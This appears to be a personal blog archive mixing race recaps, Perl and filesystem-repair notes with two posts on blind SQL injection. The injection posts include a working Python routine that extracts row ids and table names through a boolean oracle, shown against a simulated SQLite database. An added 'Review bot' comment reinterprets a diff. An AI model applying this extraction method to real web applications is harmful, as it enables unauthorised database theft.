I did a race yesterday called Muddy Buddy with Jason. It’s a 10K with 5 legs where one person runs one leg while the other is biking, and you switch at every leg. There are obstacles between the legs as well, such as monkey bars, a low wall, and a couple of rope climbs. It was a pretty cool race, but a lot more difficult than I thought it would be. I should also mention there’s a big huge mud pit you have to crawl through at the end, hence the name Muddy Buddy. ;) Jason and I were pretty evenly matched and did pretty well, finishing with a time of 54 minutes, 36 seconds, coming in 36th out of 60 in our division and 327th overall (out of 897 teams - official results). I sure do hurt today, and I’ve still got dirt coming out of various body parts, but I had a great time.
Pbcopy and Hexdumps
More Blind SQL
Success! I can now successfully extract data from a Blind SQL-vulnerable web application with under 500 lines of Perl. And Absinthe, after running for the entire 3-day weekend+, is just now beginning to pull the actual table names. I’m not knocking it, as its data retrieval is probably much more robust than mine, but I’m a sucker for immediate gratification.
Now I just need to prettify the output…
dances
Blind SQL Haxoring
I’ve been playing with 0x90’s Absinthe quite a bit lately, and while it’s an amazing tool, I’m a little disappointed in some of the methods it uses to gather database information. According to the presentation given at BlackHat in ’04, table ids are gathered first and then the table names are gathered using that information. The same is done with fields. Through my usage, I’ve noticed two things wrong with this approach, at least in terms of speed.
First, although I’m not completely sure of the size of the id field, it can be quite large: at least 10 digits, anywhere up to the largest value that fits in a signed 32-bit integer (2,147,483,647) if you want to get technical. Yet every single time Absinthe tries to identify an id, the search_value (see the PDF) is initialized at 2 and increased exponentially until it passes the id, so the number of probes grows with the magnitude of the id and the operation gets increasingly expensive as the ids get larger. Why not sort the ids in the SQL query and initialize search_value with the previously identified id? The search would then only have to cover the gap between consecutive ids instead of starting from scratch each time, which seems to me would save quite a few queries, especially when blind SQL injection is such an expensive operation in the first place.
Second, querying for the ids isn’t really necessary. I’ve had Absinthe running for over 24 hours straight and it’s still querying for ids. In approximately the same amount of time, although not contiguous, I’ve been able to code up some Perl that pulls the database structure without any use of ids. Granted, it uses inner joins, which can also be somewhat expensive, but I get much more immediate results. Gotta love immediate gratification. :-)
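To make both points concrete, here is an added example; it is not code from this post, from my Perl, or from Absinthe. It simulates a boolean blind oracle over an in-memory SQLite database: the injected condition is evaluated for real, but the caller only ever learns true or false, exactly as with a blind page. The schema, the row ids, the assumption that Absinthe's search_value doubles each round, and the LENGTH/UNICODE/SUBSTR character walk are all my assumptions for the demo. dump_ids(False) recovers each id from scratch; dump_ids(True) seeds every search with the previously recovered id from a sorted query, and the query count it returns shows the saving. dump_table_names() walks the schema with ORDER BY/OFFSET and never touches an id at all, which is the second point (without the joins my Perl uses).

```python
import sqlite3

# Constructed stand-in for the vulnerable application's database; the post
# names no schema, so these tables, rows and ids are assumptions.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT);
    CREATE TABLE orders(id INTEGER PRIMARY KEY, item TEXT);
    INSERT INTO users VALUES (2000000000, 'alice'), (2000000050, 'bob'),
                             (2000000300, 'carol');
""")

queries = 0  # how many yes/no questions the "page" has been asked so far


def oracle(condition):
    """Blind oracle: stands in for an injected WHERE clause whose only
    visible effect is whether the page renders the 'true' or 'false' way."""
    global queries
    queries += 1
    return conn.execute(f"SELECT ({condition})").fetchone()[0] == 1


def extract_int(expr, lo=0, max_step=2 ** 40):
    """Recover the integer value of SQL expression `expr`, known to be >= lo.
    Phase 1 mirrors the search_value behaviour described above: the probe
    starts two above lo and doubles until the target lies below it.
    Phase 2 bisects the final interval. Passing the previously recovered id
    as `lo` is the sorted-ids shortcut proposed in the post."""
    step = 2
    while not oracle(f"{expr} < {lo + step}"):
        step *= 2
        if step > max_step:
            raise ValueError("no upper bound found (NULL expression?)")
    hi = lo + step
    if step > 2:
        lo = lo + step // 2  # target was not below the previous probe
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle(f"{expr} < {mid}"):
            hi = mid
        else:
            lo = mid
    return lo


def dump_ids(use_previous):
    """Recover every users.id in ascending order; returns (ids, query_count).
    With use_previous=True each search starts from the last id found."""
    global queries
    queries = 0
    count = extract_int("(SELECT COUNT(*) FROM users)")
    ids, prev = [], 0
    for n in range(count):
        expr = f"(SELECT id FROM users ORDER BY id LIMIT 1 OFFSET {n})"
        prev = extract_int(expr, lo=prev if use_previous else 0)
        ids.append(prev)
    return ids, queries


def extract_string(expr):
    """Recover a string expression: its length first, then one code point per
    position (printable ASCII assumed, so each search starts at 31)."""
    length = extract_int(f"LENGTH({expr})")
    return "".join(
        chr(extract_int(f"UNICODE(SUBSTR({expr}, {i}, 1))", lo=31))
        for i in range(1, length + 1)
    )


def dump_table_names():
    """Walk the schema by ORDER BY/OFFSET instead of by object id;
    returns (names, query_count)."""
    global queries
    queries = 0
    count = extract_int("(SELECT COUNT(*) FROM sqlite_master WHERE type = 'table')")
    names = []
    for n in range(count):
        expr = (f"(SELECT name FROM sqlite_master WHERE type = 'table' "
                f"ORDER BY name LIMIT 1 OFFSET {n})")
        names.append(extract_string(expr))
    return names, queries


if __name__ == "__main__":
    for flag in (False, True):
        ids, q = dump_ids(flag)
        print(f"use_previous={flag}: {ids} in {q} queries")
    names, q = dump_table_names()
    print(f"tables: {names} in {q} queries")
```

With three ids a few hundred apart but all around two billion, the from-scratch run spends roughly sixty queries per id, while the seeded run pays that price once and then only a dozen or so per id; the bigger and closer together the ids, the bigger the gap. The max_step guard is there because a NULL expression (an OFFSET past the last row, say) never satisfies the comparison and would otherwise double forever.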
Well enough of that…time to hit up the town!
02:25
2:25 am. I’m coming home after a late night out. Not too late, but late enough to bring out the guys asking for a dollar for 4 quarters. I look to my right on the “L” platform and what do I see but a family of 4 - mother, father, and a set of twins. What could they be doing out this late, I wonder… What could they be doing that requires them to bring their poor sleeping daughters, slumped in their arms, out at this time of night? I may never know, but I can only hope I never have to do the same.
irritated
Activestate HTTPS
Compiling SSL support for ActiveState Perl is no fun. I tried it one day (and succeeded), but it was still a pain and took the entire day. Thanks go to John Bokma for making it as easy as
ppm> install http://theoryx5.uwinnipeg.ca/ppms/Crypt-SSLeay.ppd
I haven’t verified that it works, but if somebody does please let me know!
Update - Confirmed, it works!
Yet Another Reason to Drink Mountain Dew
Looks like I have yet another reason to drink Mountain Dew.
Beginning August 28, 2005, Mountain Dew and Xbox® will select a winner of an Xbox 360™ gaming and entertainment system every 10 minutes, 24 hours a day, seven days a week, for nine weeks straight! That’s an Xbox 360 every 600 seconds!
Pepsi sure is being an advertising whore - they just wrapped up a promotion to win Apple iTunes songs on Pepsi bottle caps and now they’re promoting Microsoft’s Xbox 360. I’d much rather win a $400 Xbox and a $0.99 song, though…wouldn’t you?
More details on everytenminutes.com.
Identity Theft Steps Up a Notch
Schneier blogged this morning about how an identity thief managed to steal a house! Apparently, the thief had merely transferred the deed using a stolen SSN and driver’s license number.
I’d be curious to see how the thief managed to get ahold of that information. That’s a crazy example of extreme identity theft, though.
The Kitchen
I put some pics of my kitchen up recently. It looks really nice in these pictures, but most of that is due to Stacey. Now I just need to work on getting some furniture in my living room!
Get Your Reiserfsck On
It sucks when your home directory partition gets foo bar’ed.
########### reiserfsck --rebuild-tree started at Wed Aug 17 03:33:36 2005 ###########
Pass 0:
Loading on-disk bitmap .. ok, 18207763 blocks marked used
Skipping 8818 blocks (super block, journal, bitmaps)
18198945 blocks will be read
0% left 17928713, 5874 /sec
One of my partitions has begun acting up, causing kernel oopses in Linux and locking things up. I hope this fixes it…and I hope I don’t end up with gobs of nameless files in lost+found. Luckily I was able to scratch up the 70 GB required to back up said home directories. Had to burn off a few rainbow crack tables, tho… ;)
Update: That went flawlessly! I’m only missing one file, which I was already getting access denied on prior to the fix, which meant it was having some issues anyway…
--- old_home-fixed.ls 2005-08-17 04:20:28.000000000 -0500
+++ old_home.ls 2005-08-17 03:29:23.000000000 -0500
@@ -4410,7 +4410,6 @@
 /mnt/tmp/mp3/Dance-Techo-Electronic/Dream Dance Vol30:
 .
 ..
-01-ATB - Sunset Girl.mp3
 01-Dj Shog - Tribute.mp3
 02-Chicane - Daylight.mp3
 02-Woody Van Eyden - Unfinished Symphony.mp3
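Review bot: the direction of this hunk is worth a second look before concluding a file was lost. The `---` side is old_home-fixed.ls and the `+++` side is old_home.ls, so the single `-01-ATB - Sunset Girl.mp3` line is present in the post-rebuild listing and absent from the pre-fix one (7 lines versus 6 in the `@@ -4410,7 +4410,6 @@` header). Read that way, the rebuild recovered the entry that ls could not see before, which matches the access-denied symptom; swapping the two arguments to diff would make the listing read the way the sentence above describes it.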